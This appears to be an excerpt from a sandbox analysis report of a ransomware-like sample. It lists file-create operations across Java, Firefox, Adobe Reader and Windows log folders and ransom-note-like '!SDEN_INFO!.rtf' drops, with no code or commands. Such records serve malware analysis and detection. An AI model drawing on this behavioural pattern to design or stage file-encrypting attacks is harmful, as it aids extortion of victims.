| Create | C:\Program Files\Java\jre1.8.0_144\lib\jsse.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\release | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ca-ES\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\DQrD.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\FD1HVy\Pictures\U30sMl7_p5d y.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\netfx_Extended_x64.msi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\features\aushelper@mozilla.org.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\extensions\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\features\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\VisualElements\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\rempl\Logs\Remediation.003.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\sunpkcs11.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-GB\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\588bce7c90097ed212\Windows6.1-KB958488-v6001-x86.msu | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\plugin.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\javaws.policy | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\de-AT\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-IN\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-AR\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-MX\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-BE\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\is-IS\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-XF\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nb-NO\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\jquery-3.1.1.min.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaSansRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ar-sa\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ru-RU\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-HK\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\images\cursors\win32_MoveDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-AU\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Windows PowerShell.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.009.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\jvm.hprof.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\THIRDPARTYLICENSEREADME.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\manifest.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\dictionaries\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\psfont.properties.ja | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\security\local_policy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\LanguageSelector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\jp2launcher.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\pl-PL\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-US\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\precomplete | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\wab.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| Create | C:\Program Files\Windows Security\vt mapping.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Full.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\Welcome.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\features\firefox@getpocket.com.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\browser\features\e10srollout@mozilla.org.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Protect_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\bg-BG\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Ntfs%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\style.min.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\eu-ES\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sv-SE\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-SMBClient%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.003.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\hu-HU\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\FillSign.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-CA\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-ZA\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\metadata.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\server\classes.jsa | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\crashreporter.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\charsets.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\minidump-analyzer.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\Back_0000_Hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\defaults\pref\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fi-FI\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\rempl\Logs\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ar-sa\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\bg-BG\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ca-ES\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\de-AT\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-AU\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-CA\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-GB\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-IN\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-US\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-AR\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-MX\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\eu-ES\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-BE\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\fr-XF\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\hu-HU\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\is-IS\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\nb-NO\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\pl-PL\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\ru-RU\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\sv-SE\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\zh-HK\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\UNP\Logs\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
